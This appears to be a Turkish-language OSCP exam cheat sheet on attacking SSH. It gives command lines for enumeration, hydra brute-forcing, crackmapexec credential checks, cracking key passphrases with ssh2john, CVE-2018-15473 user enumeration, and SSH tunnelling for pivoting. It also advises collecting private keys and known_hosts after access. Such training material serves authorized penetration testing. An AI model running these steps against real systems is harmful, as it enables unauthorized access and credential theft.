FOOTHOLD Metodoloji Cheat-sheet
22

SSH

linux

OpenSSH enumeration, auth method discovery, username enumeration (CVE-2018-15473), password/key brute-forcing, and using SSH for tunneling/pivoting (local/remote/dynamic forwards).

┌──

Komutlar

nmap ✓ EXAM-SAFE
nmap -p 22 -sV -sC {{RHOST}}
SSH versiyon tespiti + varsayilan NSE scriptleri (ssh-hostkey, ssh-auth-methods). HackTricks — Pentesting SSH
nmap ✓ EXAM-SAFE
nmap -p 22 --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey,sshv1 {{RHOST}}
Desteklenen sifreleme algoritmalari, kimlik dogrulama yontemleri ve host key fingerprint enumerasyonu. HackTricks — Pentesting SSH
nc ✓ EXAM-SAFE
nc {{RHOST}} {{RPORT}}
Banner grabbing — OpenSSH surumu ve OS ipucu icin ham baglanti. HackTricks — Pentesting SSH
ssh ✓ EXAM-SAFE
ssh -v {{USER}}@{{RHOST}} -p {{RPORT}}
Verbose baglanti ile kabul edilen auth yontemlerini (publickey, password, keyboard-interactive) gormek. HackTricks — Pentesting SSH
ssh-audit ✓ EXAM-SAFE
ssh-audit {{RHOST}}:{{RPORT}}
SSH yapilandirma/algoritma denetimi ve bilinen zafiyet isaretleri. HackTricks — Pentesting SSH
hydra ✓ EXAM-SAFE
hydra -L {{WORDLIST}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}}
SSH password brute-force (dusuk thread sayisi ile, MaxStartups limitlerini asmamak icin). HackTricks — Pentesting SSH
hydra ✓ EXAM-SAFE
hydra -l {{USER}} -P {{WORDLIST}} -t 4 ssh://{{RHOST}}:{{RPORT}}
Bilinen tek kullanici icin parola sozluk saldirisi. TJnull PWK/OSCP Prep guide
crackmapexec ✓ EXAM-SAFE
crackmapexec ssh {{RHOST}} -u {{USER}} -p {{PASS}}
SSH kimlik bilgisi dogrulama / yayilim kontrolu (cme/nxc ssh modulu). HackTricks — Pentesting SSH
ssh-keygen ✓ EXAM-SAFE
ssh-keygen -lf {{WORDLIST}}
Ele gecirilen private/public key fingerprint dogrulamasi (loot triyaji). HackTricks — Pentesting SSH
ssh2john ✓ EXAM-SAFE
ssh2john id_rsa > hash.txt && john --wordlist={{WORDLIST}} hash.txt
Parola korumali private key passphrase kirma. PayloadsAllTheThings — SSH
ssh ✓ EXAM-SAFE
chmod 600 id_rsa && ssh -i id_rsa {{USER}}@{{RHOST}} -p {{RPORT}}
Ele gecirilen private key ile oturum acma (key permissions 600 olmali). HackTricks — Pentesting SSH
python ⚠ RESTRICTED
python3 ssh_enum.py {{RHOST}} {{WORDLIST}}
CVE-2018-15473 OpenSSH < 7.7 kullanici enumerasyonu (gecerli/gecersiz kullanici timing/oddity). HackTricks — Pentesting SSH
ssh ✓ EXAM-SAFE
ssh -L {{LPORT}}:127.0.0.1:{{RPORT}} {{USER}}@{{RHOST}}
Local port forward — hedefin sadece localhost dinleyen servisini Kali'ye getirme. HackTricks — SSH Tunneling
ssh ✓ EXAM-SAFE
ssh -D {{LPORT}} {{USER}}@{{RHOST}}
Dynamic SOCKS proxy kurma — proxychains ile ic aga pivot. HackTricks — SSH Tunneling
ssh ✓ EXAM-SAFE
ssh -R {{RPORT}}:127.0.0.1:{{LPORT}} {{USER}}@{{RHOST}}
Remote port forward — Kali servisini hedef uzerinden erisilebilir kilma (firewall bypass / geri pivot). HackTricks — SSH Tunneling

Genel Bakis

SSH (varsayilan 22/tcp) OSCP makinelerinde hem foothold (zayif parola/ele gecirilen key) hem de pivot araci olarak kritiktir. Once banner ve desteklenen auth yontemlerini cikar, sonra brute-force veya ele gecirilen anahtarlarla erisim dene.

Enumeration

  • nmap NSE scriptleri ile ssh-auth-methods ciktisini oku: password aciksa brute-force mantikli, sadece publickey ise key avina don.
  • ssh-hostkey ve ssh2-enum-algos ile eski/zayif yapilandirma (CBC, SSHv1) tespit et.
  • Banner’daki OpenSSH surumu < 7.7 ise kullanici enumerasyonu (CVE-2018-15473) gundeme gelir.

Bilinen Zafiyetler

  • CVE-2018-15473: OpenSSH < 7.7 kullanici enumerasyonu. Gecerli kullanicilar farkli yanit suresi/davranisi verir. Exam’de otomatik exploit oldugu icin restricted saydim; cikti listesini diger servislerle (web, SMTP) capraz dogrula.
  • Eski surumlerde algoritma dusurme; OSCP’de nadiren direkt exploit, daha cok yapilandirma notu.

Exploitation / Auth

  • Web/FTP/SMB enumerasyonundan elde edilen kullanici adlarini hedef alarak hydra calistir. Thread’i dusuk tut (-t 4) cunku OpenSSH MaxStartups/MaxAuthTries baglantilari erken keser ve yuksek thread false-negative uretir.
  • Diger servislerden sizan parolalari crackmapexec ssh ile hizlica dogrula (password reuse cok yaygin).
  • Ele gecirilen id_rsa icin once chmod 600, passphrase varsa ssh2john + john ile kir.

Pivot / Loot Notlari

  • Erisim sonrasi ~/.ssh/ icindeki id_rsa, authorized_keys, known_hosts dosyalarini topla — yatay hareket icin altin degerinde.
  • known_hosts ic ag hedeflerini (hashli olsa bile) ifsa edebilir; ic agi haritalamak icin kullan.
  • Tunneling: localhost’a bagli ic servisler icin local forward, ic aga genis erisim icin dynamic SOCKS (+proxychains), firewall arkasindaki Kali servisine geri baglanmak icin remote forward.

Gotchas

  • Key permissions 600 degilse SSH anahtari reddeder.
  • Bazi makineler password auth’u kapatip sadece key kabul eder; brute-force’a vakit harcamadan auth-methods ciktisina bak.
  • Rate limiting nedeniyle hydra’da takiliyorsan -t 1 ve -W 1 dene.
┌──

İlgili teknikler

Linux PrivEsc Enumeration Metodolojisi (linpeas / LinEnum / pspy / Manuel Checklist)SSH Anahtarları ile Privilege Escalation (okunabilir private key, writable authorized_keys, agent hijack, known_hosts)Servis Exploit & Varsayılan Kimlik Bilgisi İş Akışı
┌──

Kaynaklar

↗ HackTricks — Pentesting SSH (port 22)TJnull PWK/OSCP Prep guide↗ PayloadsAllTheThings — SSH↗ GTFOBins: ssh
0/15 set